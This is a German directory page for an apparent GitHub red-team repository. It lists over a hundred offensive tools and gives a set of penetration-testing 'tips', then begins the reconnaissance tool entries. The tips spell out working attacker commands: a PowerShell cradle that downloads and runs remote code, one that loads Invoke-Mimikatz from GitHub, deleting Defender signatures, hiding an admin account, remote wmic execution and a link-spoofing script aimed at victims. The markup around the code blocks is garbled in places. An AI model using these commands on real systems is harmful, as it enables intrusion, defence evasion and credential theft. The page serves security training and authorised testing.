Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
RedTeam-Tools — Werkzeuge und Techniken für Red Team / Penetrationstests | Kitploit
Tools/GitHubGitHub/a-poc/redteam-tools
OSINT (Open-Source-Intelligence)Privilege EscalationAufklärungExploitationLaterale BewegungPost-ExploitationPhishingPenetrationstestsRed TeamingPayload-Entwicklung
GitHuba-poc/redteam-tools

RedTeam-Tools

9.6k1.3k11vor 4 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Werkzeuge und Techniken für Red Team / Penetrationstests

Repository anzeigen

RedTeam-Tools

Dieses GitHub-Repository enthält eine Sammlung von 150+ Werkzeugen und Ressourcen, die für Red-Team-Aktivitäten nützlich sein können.

Einige der Werkzeuge sind speziell für Red Teaming konzipiert, während andere allgemeinerer Natur sind und für einen Red-Teaming-Kontext angepasst werden können.

🔗 Wenn Sie ein Blue Teamer sind, schauen Sie sich BlueTeam-Tools an.

Warnung

Die Materialien in diesem Repository dienen nur zu Informations- und Bildungszwecken. Sie sind nicht für die Verwendung in illegalen Aktivitäten bestimmt.

Hinweis

Verstecken Sie die Tool-Liste-Überschriften mit dem Pfeil.

Klicken Sie auf 🔙, um zur Liste zurückzukehren.

Werkzeugliste

Red Team Tipps 19 Tipps
    • Improved HTML smuggling with mouse move eventlistener @pr0xylife
    • Google translate for phishing @malmoeb
    • Hiding the local admin account @Alh4zr3d
    • Cripple windows defender by deleting signatures @Alh4zr3d
    • Enable multiple RDP sessions per user @Alh4zr3d
    • Sysinternals PsExec.exe local alternative @GuhnooPlusLinux
    • Live off the land port scanner @Alh4zr3d
    • Proxy aware PowerShell DownloadString @Alh4zr3d
    • Looking for internal endpoints in browser bookmarks @Alh4zr3d
    • Query DNS records for enumeration @Alh4zr3d
    • Unquoted service paths without PowerUp @Alh4zr3d
    • Bypass a disabled command prompt with /k Martin Sohn Christensen
    • Stop windows defender deleting mimikatz.exe @GuhnooPlusLinux
    • Check if you are in a virtual machine @dmcxblue
    • Enumerate AppLocker rules @Alh4zr3d
    • CMD shortcut with 6 pixels via mspaint PenTestPartners
    • Link spoofing with PreventDefault JavaScript method
    • Check SMB firewall rules with Responder @malmoeb
    • Disable AV with SysInternals PsSuspend @0gtweet
Aufklärung 24 Werkzeuge
    • spiderfoot Automatisierte OSINT- und Angriffsflächenkartierung
    • reconftw Automatisiertes Subdomain- und Schwachstellen-Recon-Tool
    • subzy Prüfer für Subdomain-Übernahme-Schwachstellen
    • smtp-user-enum SMTP-Benutzerenumeration
    • crt.sh -> httprobe -> EyeWitness Automatisierte Domain-Screenshots
    • jsendpoints Seiten-DOM-Links extrahieren
    • nuclei Schwachstellenscanner
    • certSniff Zertifikatstransparenzprotokoll-Stichwort-Sniffer
    • gobuster Website-Pfad-Brute-Force
    • feroxbuster Schnelles Content-Discovery-Tool in Rust
    • CloudBrute Cloud-Infrastruktur-Brute-Force
    • dnsrecon DNS-Einträge aufzählen
    • Shodan.io Wissensdatenbank für öffentlich zugängliche Systeme
    • AORT (All in One Recon Tool) Subdomain-Enumeration
    • spoofcheck SPF-/DMARC-Eintragsprüfer
    • AWSBucketDump S3-Bucket-Enumeration
    • GitHarvester GitHub-Anmeldeinformationssuche
    • truffleHog GitHub-Anmeldeinformationsscanner
    • Dismap Asset-Erkennung/-Identifikation
    • enum4linux Windows-/Samba-Enumeration
    • skanuvaty Gefährlich schneller DNS-/Netzwerk-/Portscanner
Ressourcenentwicklung 12 Werkzeuge
    • remoteinjector Entfernte Vorlagenverknüpfung in Word-Dokument einfügen
    • Chimera PowerShell-Verschleierung
    • msfvenom Payload-Erstellung
    • Shellter Dynamisches Shellcode-Injektionstool
    • Freeze Payload-Erstellung (Umgehung von EDR)
    • WordSteal NTML-Hashes mit Microsoft Word stehlen
    • NTAPI Undocumented Functions Windows NT Kernel, Native API und Treiber
    • Kernel Callback Functions Undokumentierte Windows-APIs
    • OffensiveVBA Office-Makro-Codeausführung und Umgehungstechniken
    • WSH Wsh-Payload
    • HTA Hta-Payload
    • VBA Vba-Payload
Erstzugriff 10 Werkzeuge
    • CredMaster CredKing-Password-Spraying-Tool
    • TREVORspray Password-Sprayer mit Threading
    • evilqr QRLJacking-Phishing-PoC
    • CUPP Common User Passwords Profiler (CUPP)
    • Bash Bunny USB-Angriffstool
    • EvilGoPhish Phishing-Kampagnen-Framework
    • The Social-Engineer Toolkit Phishing-Kampagnen-Framework
    • Hydra Brute-Force-Tool
    • SquarePhish OAuth-/QR-Code-Phishing-Framework
    • King Phisher Phishing-Kampagnen-Framework
Ausführung 13 Werkzeuge
    • Responder LLMNR-, NBT-NS- und MDNS-Vergifter
    • secretsdump Entfernter Hash-Dumper
    • evil-winrm WinRM-Shell
    • Donut In-Memory-.NET-Ausführung
    • Macro_pack Makro-Verschleierung
    • PowerSploit PowerShell-Skriptsammlung
    • Rubeus Active-Directory-Hacking-Tool
    • SharpUp Windows-Schwachstellenidentifikator
    • SQLRecon Offensives MS-SQL-Toolkit
    • UltimateAppLockerByPassList Häufige AppLocker-Umgehungstechniken
    • StarFighters JavaScript- und VBScript-basierter Empire-Launcher
    • demiguise HTA-Verschlüsselungstool
    • PowerZure PowerShell-Framework zur Bewertung der Azure-Sicherheit
Persistenz 4 Werkzeuge
    • Impacket Python-Skriptsammlung
    • Empire Post-Exploitation-Framework
    • SharPersist Windows-Persistenz-Toolkit
    • ligolo-ng Tunnelwerkzeug, das eine TUN-Schnittstelle verwendet
Privilegienerweiterung 11 Werkzeuge
    • Crassus Windows-Privilegienerweiterungs-Erkennungstool
    • LinPEAS Linux-Privilegienerweiterung
    • WinPEAS Windows-Privilegienerweiterung
    • linux-smart-enumeration Linux-Privilegienerweiterung
    • Certify Active-Directory-Privilegienerweiterung
    • Get-GPPPassword Windows-Passwort-Extraktion
    • Sherlock PowerShell-Privilegienerweiterungstool
    • Watson Windows-Privilegienerweiterungstool
    • ImpulsiveDLLHijack DLL-Hijack-Tool
    • ADFSDump AD-FS-Dump-Tool
    • BeRoot Multi-OS-Privilegienerweiterungsprojekt
Umgehung der Verteidigung 8 Werkzeuge
    • Invoke-Obfuscation Skript-Verschleierer
    • Veil Metasploit-Payload-Verschleierer
    • SharpBlock EDR-Umgehung durch Blockierung des Einstiegspunktausführung
    • Alcatraz GUI x64-Binär-Verschleierer
    • Mangle Manipulation kompilierter ausführbarer Dateien
    • AMSI Fail PowerShell-Ausschnitte, die AMSI brechen oder deaktivieren
    • ScareCrow Payload-Erstellungs-Framework für EDR-Umgehung
    • moonwalk Linux-Systemlog- und Dateisystem-Zeitstempel-Entferner
Zugriff auf Anmeldeinformationen 11 Werkzeuge
    • Mimikatz Windows-Anmeldeinformationen-Extraktor
    • LaZagne Lokaler Passwort-Extraktor
    • hashcat Passwort-Hash-Knacken
    • John the Ripper Passwort-Hash-Knacken
    • SCOMDecrypt SCOM-Anmeldeinformations-Entschlüsselungstool
    • nanodump LSASS-Prozess-Minidump-Erstellung
    • eviltree Tree-Neuerstellung zur Erkennung von Anmeldeinformationen
    • SeeYouCM-Thief Parsen von Konfigurationsdateien von Cisco-Telefonsystemen
    • MailSniper Microsoft Exchange-Mail-Sucher
    • SharpChromium Cookie-, Verlaufs- und gespeicherte Login-Chromium-Extraktor
    • dploot DPAPI aus der Ferne in Python auslesen
Erkennung 6 Werkzeuge
    • PCredz Erkennung von Anmeldeinformationen (PCAP/live interface)
    • PingCastle Active-Directory-Bewerter
    • Seatbelt Lokaler Schwachstellenscanner
    • ADRecon Active-Directory-Recon
    • adidnsdump Dumping von Active Directory Integrated DNS
    • scavenger Scanntool zum Durchsuchen von Systemen
Laterale Bewegung 12 Werkzeuge
    • crackmapexec Windows-/Active-Directory-Toolkit für laterale Bewegung
    • WMIOps WMI-Fernbefehle
    • PowerLessShell Remote PowerShell ohne PowerShell
    • PsExec Leichter Telnet-Ersatz
    • LiquidSnake Dateilose laterale Bewegung
    • Enabling RDP Windows-RDP-Aktivierungsbefehl
    • Upgrading shell to meterpreter Reverse-Shell-Verbesserung
    • Forwarding Ports Lokaler Port-Forwarding-Befehl
    • Jenkins reverse shell Jenkins-Shell-Befehl
    • ADFSpoof Fälschung von AD FS-Sicherheitstoken
    • kerbrute Tool zur Kerberos-Pre-Auth-Bruteforce
    • Coercer Windows-Server zur Authentifizierung zwingen
    • WMIOps WMI-Fernbefehle
Sammlung 3 Werkzeuge
    • BloodHound Active-Directory-Visualisierung
    • Snaffler Active-Directory-Sammler für Anmeldeinformationen
    • linWinPwn Active-Directory-Enumeration und Schwachstellenprüfungen
Kommando und Kontrolle 9 Werkzeuge
    • Living Off Trusted Sites Project Legitime Domains für Ihr C2 nutzen
    • Havoc Command-and-Control-Framework
    • Covenant Command-and-Control-Framework (.NET)
    • Merlin Command-and-Control-Framework (Golang)
    • Metasploit Framework Command-and-Control-Framework (Ruby)
    • Pupy Command-and-Control-Framework (Python)
    • Brute Ratel Command-and-Control-Framework ($$$)
    • NimPlant C2-Implantat in Nim geschrieben
    • Hoaxshell PowerShell-Reverse-Shell
Exfiltration 6 Werkzeuge
    • Dnscat2 C2 über DNS-Tunneling
    • Cloakify Datentransformation für Exfiltration
    • PyExfil Datenexfiltrations-PoC
    • Powershell RAT Python-basierter Backdoor
    • GD-Thief Google-Drive-Exfiltration
    • goshs Single-Binary-Multi-Protocol-Server für Dateitransfer und Exfiltration
Auswirkung 4 Werkzeuge
    • Conti Pentester Guide Leak Toolkit der Conti-Ransomware-Gruppe für Partner
    • SlowLoris Einfacher Denial-of-Service
    • usbkill Anti-Forensik-Kill-Switch
    • Keytap Gedrückte Tasten aus Tippgeräuschen ermitteln

Red Team Tipps

Lernen Sie von Red Teamern mit einer Sammlung von Red-Teaming-Tipps. Diese Tipps decken eine Reihe von Taktiken, Tools und Methoden ab, um Ihre Red-Teaming-Fähigkeiten zu verbessern.

🔙Improved HTML smuggling with mouse move eventlistener

Beschreibung: 'Qakbot fügte dem HTML-Schmuggel-Anhang einen EventListener für Mausbewegungen hinzu, um Anti-Evasion in Sandboxen zu ermöglichen, sodass das ZIP nicht abgelegt wird.'

Quelle: @pr0xylife

Link: Twitter

🔙Google translate for phishingBeschreibung: Erfolgreicher Diebstahl von Anmeldeinformationen über eine Phishing-Seite, die über die Google Translate-Seitenansichtsfunktion weitergeleitet wird.

Credit: @malmoeb

Link: Twitter

🔙Ausblenden des lokalen Administratorkontos```bash

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /v alh4zr3d /d 0 /f

root@kitploit:~
**Beschreibung:** *'Die Erstellung von Konten ist riskant, wenn man sich vor Blue versteckt, aber bei der Erstellung eines lokalen Administrators kann man eine niedliche Registry-Zauberei verwenden, um es zu verstecken.'*

**Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1612913838999113728)

### [🔙](#tool-list)Windows Defender durch Löschen von Signaturen lahmlegen```bash
"%Program Files%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

Beschreibung: 'Ein bisschen chaotisch, aber wenn Windows Defender dir große Kopfschmerzen bereitet, solltest du ihn nicht deaktivieren (was den Benutzer alarmiert), sondern ihn einfach entkernen, indem du alle Signaturen löschst.'

Quelle: @Alh4zr3d

Link: Twitter

🔙Mehrere RDP-Sitzungen pro Benutzer aktivieren```bash

reg add HKLM\System\CurrentControlSet\Control\TerminalServer /v fSingleSessionPerUser /d 0 /f

root@kitploit:~
**Beschreibung:** *'Manchmal möchte man sich per RDP oder ähnlich bei einem Host anmelden, aber der eigene Benutzer hat eine aktive Sitzung. Mehrere Sitzungen pro Benutzer aktivieren.'*

**Quelle:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1609954528425558016)

### [🔙](#tool-list)Sysinternals PsExec.exe lokale Alternative```bash
wmic.exe /node:10.1.1.1 /user:username /password:pass process call create cmd.exe /c " command "

Beschreibung: 'Hast du es satt, bei lateraler Bewegung immer Sysinternals PsExec.exe hochzuladen? Windows hat eine bessere Alternative vorinstalliert. Versuch stattdessen dies.'

Credit: @GuhnooPlusLinux

Link: Twitter

🔙Live-off-the-Land-Portscanner```bash

0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(<tgt_ip>,$)) "Port $ open"} 2>$null

root@kitploit:~
**Beschreibung:** *'Wenn möglich, nutzen Sie die vorhandenen Ressourcen des Systems anstatt Tools auf die Maschinen hochzuladen (aus vielen Gründen). PowerShell/.NET helfen. Beispiel: einfacher Port-Scanner in PowerShell.'*

**Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1605060950339588096)

### [🔙](#tool-list)Proxy-bewusster PowerShell DownloadString```bash
$w=(New-Object Net.WebClient);$w.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $w.DownloadString("<url>")

Beschreibung: 'Die meisten großen Organisationen verwenden heutzutage Web-Proxys. Die standardmäßige PowerShell-Download-Wiege ist nicht proxy-fähig. Verwenden Sie diese.'

Quelle: @Alh4zr3d

Link: Twitter

🔙Auf der Suche nach internen Endpunkten in Browser-Lesezeichen```bash

type "C:\Users%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks.bak" | findstr /c "name url" | findstr /v "type"

root@kitploit:~
**Beschreibung:** *'Sie wären überrascht, was Sie allein aus den Lesezeichen eines Benutzers herausfinden können. Interne Endpunkte, auf die sie zugreifen können, zum Beispiel.'*

**Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1595488676389171200)

### [🔙](#tool-list)DNS-Einträge für die Enumeration abfragen```bash
Get-DnsRecord -RecordType A -ZoneName FQDN -Server <server hostname>

Beschreibung: 'Aufklärung ist 95% des Spiels. Aber das Ausführen von Unmengen an Scans, um die Umgebung zu bewerten, ist sehr laut. Warum nicht einfach den DC/DNS-Server nach allen DNS-Einträgen fragen?'

Danksagung: @Alh4zr3d

Link: Twitter

🔙Unquotierte Dienstpfade ohne PowerUp```bash

Get-CIMInstance -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$.StartMode -eq "Auto" -and $.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name

root@kitploit:~
**Beschreibung:** *'Finden von nicht in Anführungszeichen gesetzten Dienstpfaden ohne PowerUp'*

**Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1579254955554136064)

### [🔙](#tool-list)Deaktivierte Eingabeaufforderung mit /k umgehen```bash
# Win+R (To bring up Run Box)
cmd.exe /k "whoami"

Beschreibung: 'Diese Eingabeaufforderung wurde von Ihrem Administrator deaktiviert...' Diese Meldung erscheint häufig in Umgebungen wie Kiosk-PCs. Ein schneller Hack-Umgehung ist die Verwendung von /k über das Windows-Ausführungsfenster. Dadurch wird der Befehl ausgeführt und anschließend die Einschränkungsmeldung angezeigt, was die Befehlsausführung ermöglicht.

Credit: Martin Sohn Christensen

Link: Blog

🔙Windows Defender daran hindern, mimikatz.exe zu löschen```bash

(new-object net.webclient).downloadstring('https://raw.githubusercontent[.]com/BC-SECURITY/Empire/main/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1')|IEX;inv

root@kitploit:~
**Beschreibung:** *'Sind Sie es leid, dass Windows Defender mimikatz.exe löscht? Versuchen Sie stattdessen dies.'*

**Quellenangabe:** [@GuhnooPlusLinux](https://twitter.com/GuhnooPlusLinux)

**Link:** [Twitter](https://twitter.com/GuhnooPlusLinux/status/1605629049660809216)

### [🔙](#tool-list)Überprüfen, ob Sie sich in einer virtuellen Maschine befinden```bash
reg query HKLM\SYSTEM /s | findstr /S "VirtualBox VBOX VMWare"

Beschreibung: 'Wollen Sie wissen, ob Sie sich in einer virtuellen Maschine befinden? Fragen Sie die Registrierungsschlüssel ab und finden Sie es heraus!!! Wenn Ergebnisse angezeigt werden, befinden Sie sich in einer virtuellen Maschine.'

Autor: @dmcxblue

Link: Twitter

🔙Auflisten AppLocker-Regeln```

(Get-AppLockerPolicy -Local).RuleCollections

Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\SrpV2 -Recurse

reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\

root@kitploit:~
**Beschreibung:** *'AppLocker kann eine Qual sein. Erhebe Daten, um zu sehen, wie schlimm es ist.'*

**Quelle:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**Link:** [Twitter](https://twitter.com/alh4zr3d/status/1614706476412698624)

### [🔙](#tool-list)CMD-Verknüpfung mit 6 Pixeln via mspaint

![image](https://assets.kitploit.com/production/public/readmes/147/db03137fe19c2c20481ca53abc8beb4b7afadcf1d2add350ce26d37f75fdc41b.png)

1. Öffnen Sie MSPaint.exe und stellen Sie die Leinwandgröße auf: Breite=6 und Höhe=1 Pixel
2. Zoomen Sie hinein, um die folgenden Aufgaben zu erleichtern
3. Verwenden Sie den Farbwähler, stellen Sie die Pixelwerte (von links nach rechts) ein:
    - 1.: R: 10, G: 0, B: 0
    - 2.: R: 13, G: 10, B: 13
    - 3.: R: 100, G: 109, B: 99
    - 4.: R: 120, G: 101, B: 46
    - 5.: R: 0, G: 0, B: 101
    - 6.: R: 0, G: 0, B: 0
4. Speichern Sie es als 24-Bit-Bitmap (*.bmp;*.dib)
5. Ändern Sie die Erweiterung von bmp zu bat und führen Sie es aus.

**Beschreibung:** *'Eine ungewöhnliche, aber effektive Methode, um eine Shell zu erhalten, indem man eine Verknüpfung zu cmd.exe erstellt, indem man bestimmte Farben in Microsoft Paint zeichnet. Aufgrund des Kodierungsalgorithmus, der zum Schreiben von BMP-Dateien verwendet wird, ist es möglich, ASCII-Daten zu diktieren, die in eine Datei geschrieben werden, indem man bestimmte RGB-Farben sorgfältig auswählt.'*

**Quelle:** [PenTestPartners](https://www.pentestpartners.com/)

**Link:** [Blog](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/#gainingacommandshell)

### [🔙](#tool-list)Link-Spoofing mit der PreventDefault-JavaScript-Methode

![image](https://assets.kitploit.com/production/public/readmes/147/49ceb382e5692c79df8ca9b96ed0c17520b7cf7f1091b5b6c214478270c165e8.png)```html
<!DOCTYPE html>
<html>
  <head>
    <meta charset="UTF-8">
    <title>PreventDefault Example</title>
  </head>
  <body>
    <a href="https://google.com" onclick="event.preventDefault(); window.location.href = 'https://bing.com';">Go to Google</a>
  </body>
</html>

Beschreibung: Bedrohungsakteure wurden beobachtet, wie sie diese Technik einsetzen, um Opfer dazu zu bringen, auf gefälschte In-Page-Malware-Download-Links zu klicken. Mit der JavaScript-Methode PreventDefault kann der Hover-Link so gefälscht werden, dass er einen legitimen Link google.com anzeigt. Sobald jedoch geklickt wird, wird das Opfer auf den bösartigen Link bing.com weitergeleitet. Ideal, um Opfer dazu zu bringen, Payloads über eine kontrollierte Website herunterzuladen.

Link: PreventDefault-Dokumentation

🔙Überprüfen von SMB-Firewall-Regeln mit Responder

Bild```powershell Copy-Item -Path "C:\tmp" -Destination "\<ip_running_responder>\c$"

root@kitploit:~
**Beschreibung:** *'Wenn ich eine Kompromissbewertung durchführe, frage ich den Kunden oft, ob ich noch eine schnelle Überprüfung machen kann: `Copy-Item -Path "C:\tmp\" -Destination "\\<ip_running_responder>\c$"`. Wenn Responder den Hash erfassen konnte, erlaubt die Firewall ausgehende SMB-Verbindungen.'*

**Credit:** [@malmoeb](https://twitter.com/malmoeb)

**Link:** [Twitter](https://twitter.com/malmoeb/status/1628272928855826433)

---

### [🔙](#tool-list)AV mit SysInternals PsSuspend deaktivieren

![image](https://assets.kitploit.com/production/public/readmes/147/060631566db51351ace6c248b736fc8878e89ba9aaf8ad4aaf2e478183468b16.png)

**Beschreibung:** *'Mit dem Microsoft Sysinternals-Tool PsSuspend.exe ist es möglich, einige AV-Dienstausführungsdateien zu pausieren. Das von Microsoft signierte Tool kann die PID oder den Namen eines laufenden Dienstes übergeben bekommen und wird den Prozess über die Windows-API NtSuspendProcess anhalten.'*

**Verwandter Blogbeitrag:** [Umgehung von AV durch Prozessaussetzung mit PsSuspend.exe](https://medium.com/@a-poc/process-suspension-with-pssuspend-exe-0cdf5d16a3b7)

**Link:** [Twitter](https://twitter.com/0gtweet/status/1638069413717975046)

---
Reconnaissance
====================

### [🔙](#tool-list)[spiderfoot](https://github.com/smicallef/spiderfoot)

SpiderFoot ist ein Open-Source-Intelligence- (OSINT-) Automatisierungstool. Es integriert sich mit nahezu jeder verfügbaren Datenquelle und verwendet eine Reihe von Methoden zur Datenanalyse, wodurch die Daten einfach navigiert werden können.

SpiderFoot kann offensiv (z. B. in einer Red-Team-Übung oder einem Penetrationstest) zur Aufklärung Ihres Ziels oder defensiv eingesetzt werden, um Informationen darüber zu sammeln, was Sie oder Ihre Organisation möglicherweise über das Internet preisgegeben haben.

**Installation:**```bash
wget https://github.com/smicallef/spiderfoot/archive/v4.0.tar.gz
tar zxvf v4.0.tar.gz
cd spiderfoot-4.0
pip3 install -r requirements.txt

Vollständige Installationsanweisungen finden Sie hier.

Verwendung:```python python3 ./sf.py -l 127.0.0.1:5001

root@kitploit:~
Viele Anleitungsvideos zur Nutzung [hier](https://asciinema.org/~spiderfoot)

![spiderfoot](https://assets.kitploit.com/production/public/readmes/147/bd95a49c8707ebb8b864103b3c024971be0bfef116fecada0a5499165378da14.png)

*Bild verwendet von https://github.com/smicallef/spiderfoot*

### [🔙](#tool-list)[reconftw](https://github.com/six2dez/reconftw)

reconFTW automatisiert den gesamten Aufklärungsprozess für Sie. Es übertrifft die Arbeit der Subdomain-Enumeration zusammen mit verschiedenen Sicherheitsüberprüfungen und der Beschaffung maximaler Informationen über Ihr Ziel.

**Installation:**```bash
git clone https://github.com/six2dez/reconftw.git;cd reconftw/;./install.sh

Vollständige Installationsanweisungen finden Sie hier.

Verwendung:```bash

Single target domain

./reconftw.sh -d target.com -r

One target with multiple domains

./reconftw.sh -m target -l domains.txt -r

Passive recon

./reconftw.sh -d target.com -p

Perform all checks and exploitations

./reconftw.sh -d target.com -a

root@kitploit:~
Ausführliche Nutzungshinweise finden Sie [hier](https://github.com/six2dez/reconftw/wiki/2.-Usage-Guide).

![reconftw](https://assets.kitploit.com/production/public/readmes/147/319a1191b403d8b616058e77f696f9b2802b59607cc7e908a38e61a8de99a25e.png)

*Bild verwendet von https://www.youtube.com/watch?v=TQmDAtkD1Wo*

### [🔙](#tool-list)[subzy](https://github.com/PentestPad/subzy)

Subdomain-Übernahme-Tool, das auf dem Abgleich von Antwort-Fingerabdrücken von [can-i-take-over-xyz](https://github.com/EdOverflow/can-i-take-over-xyz/blob/master/README.md) basiert.

**Installation:**```bash
go install -v github.com/PentestPad/subzy@latest

Vollständige Installationsanweisungen finden Sie hier.

Verwendung:```bash

List of subdomains

./subzy run --targets list.txt

Single or multiple targets

./subzy run --target test.google.com ./subzy run --target test.google.com,https://test.yahoo.com

root@kitploit:~
![subzy](https://assets.kitploit.com/production/public/readmes/147/cb8d580bf7a8b0647632d14dda58e9f350703db0fa10ef16cfdc04464520c063.jpg)

*Bild verwendet von https://www.geeksforgeeks.org/subzy-subdomain-takeover-vulnerability-checker-tool/*

### [🔙](#tool-list)[smtp-user-enum](https://github.com/cytopia/smtp-user-enum)

SMTP-Benutzerenumeration via VRFY, EXPN und RCPT mit intelligenter Timeout-, Wiederholungs- und Wiederverbindungsfunktionalität.

**Installation:**```bash
pip install smtp-user-enum

Verwendung:```bash smtp-user-enum [options] -u/-U host port smtp-user-enum --help smtp-user-enum --version

root@kitploit:~
![smtp-user-enum](https://assets.kitploit.com/production/public/readmes/147/d5d973253dfaa7e98d497954d59b83f166ba7b3807d24714a6ac40189fbdc15e.png)

*Bild verwendet von https://www.kali.org/tools/smtp-user-enum/*

### [🔙](#tool-list)crt.sh -> httprobe -> EyeWitness

Ich habe einen Bash-Einzeiler zusammengestellt, der: 
- passiv eine Liste von Subdomains aus Zertifikatsverbindungen sammelt ([crt.sh](https://crt.sh/))
- aktiv jede Subdomain anfragt, um ihre Existenz zu überprüfen ([httprobe](https://github.com/tomnomnom/httprobe))
- aktiv von jeder Subdomain einen Screenshot für die manuelle Überprüfung erstellt ([EyeWitness](https://github.com/FortyNorthSecurity/EyeWitness))

**Verwendung:**```bash
domain=DOMAIN_COM;rand=$RANDOM;curl -fsSL "https://crt.sh/?q=${domain}" | pup 'td text{}' | grep "${domain}" | sort -n | uniq | httprobe > /tmp/enum_tmp_${rand}.txt; python3 /usr/share/eyewitness/EyeWitness.py -f /tmp/enum_tmp_${rand}.txt --web

Hinweis: Sie müssen httprobe, pup und EyeWitness installiert haben und 'DOMAIN_COM' durch die Ziel-Domain ersetzen. Sie können dieses Skript gleichzeitig in mehreren Terminal-Fenstern ausführen, wenn Sie mehrere Ziel-Root-Domains haben.

Bild

Bild

🔙jsendpoints

Ein JavaScript-Bookmarklet zum Extrahieren aller Endpunkt-Links einer Webseite.

Erstellt von @renniepak, dieser JavaScript-Code-Ausschnitt kann verwendet werden, um alle Endpunkte (beginnend mit /) aus dem aktuellen Webseiten-DOM zu extrahieren, einschließlich aller externen Skriptquellen, die auf der Webseite eingebettet sind.```javascript javascript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=("|'|`))/[a-zA-Z0-9_?&=/-#.]*(?=("|'|`))/g;const results=new Set;for(var i=0;i<scripts.length;i++){var t=scripts[i].src;""!=t&&fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log("An error occurred: ",t)})}var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const match of matches)results.add(match[0]);function writeResults(){results.forEach(function(t){document.write(t+"
")})}setTimeout(writeResults,3e3);})();

root@kitploit:~
**Verwendung (Bookmarklet)** 

Erstellen Sie ein Bookmarklet...

- `Rechtsklick auf Ihre Lesezeichenleiste`
- `Klicken Sie auf 'Seite hinzufügen'`
- `Fügen Sie das obige JavaScript in das 'URL'-Feld ein`
- `Klicken Sie auf 'Speichern'`

...dann besuchen Sie die Opferseite im Browser und klicken Sie auf das Bookmarklet.

![image](https://assets.kitploit.com/production/public/readmes/147/a2a9b8ff2cacdcf419b64a6d99075dffa73471eea1201fb9a0a6b2524794849f.png)

**Verwendung (Konsole)** 

Fügen Sie das obige JavaScript in das Konsolenfenster `F12` ein und drücken Sie die Eingabetaste.

![image](https://assets.kitploit.com/production/public/readmes/147/5dd2a02f0f6874c521b8a98f35f653b1cf1a13b00a4c7e3eaf7c111700c0cc8a.png)

### [🔙](#tool-list)[nuclei](https://github.com/projectdiscovery/nuclei)

Schneller Schwachstellenscanner, der .yaml-Vorlagen verwendet, um nach bestimmten Problemen zu suchen.

**Installation:**```bash
go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest

Verwendung:```bash cat domains.txt | nuclei -t /PATH/nuclei-templates/

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/a747b7be6260c2a228ac90ac4c3500debb25dd3bf1f635c5ce736159cdd7bc81.png)

### [🔙](#tool-list)[certSniff](https://github.com/A-poc/certSniff)

certSniff ist ein Keyword-Watcher für Certificate-Transparency-Logs, den ich in Python geschrieben habe. Es verwendet die certstream-Bibliothek, um nach Protokollen zur Zertifikatserstellung zu suchen, die Schlüsselwörter enthalten, die in einer Datei definiert sind.

Sie können dies mit mehreren Schlüsselwörtern in Bezug auf Ihre Opferdomäne ausführen lassen. Alle Zertifikatserstellungen werden aufgezeichnet und können zur Entdeckung von Domänen führen, von denen Sie zuvor nichts wussten.

**Installation:**```bash
git clone https://github.com/A-poc/certSniff;cd certSniff/;pip install -r requirements.txt

Verwendung:```python python3 certSniff.py -f example.txt

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/61dca92ec35e9bafb2004f44e045f4fa02fb05263456ac447c323e7becb3cbc3.png)

### [🔙](#tool-list)[gobuster](https://www.kali.org/tools/gobuster/)

Nützliches Tool zum Brute-Forcen von Datei-/Ordnerpfaden auf einer Zielwebsite.

**Install:**```bash
sudo apt install gobuster

Verwendung:```bash gobuster dir -u "https://google.com" -w /usr/share/wordlists/dirb/big.txt --wildcard -b 301,401,403,404,500 -t 20

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/49bbb3fa465f423a5b3fa1dbe2468cb9c70ad4600532825a759da5b911a2c890.png)

### [🔙](#tool-list)[feroxbuster](https://github.com/epi052/feroxbuster)

Ein Tool, das entwickelt wurde, um Forced Browsing durchzuführen, einen Angriff, bei dem das Ziel darin besteht, Ressourcen zu enumerieren und darauf zuzugreifen, die nicht von der Webanwendung referenziert werden, aber dennoch für einen Angreifer zugänglich sind.

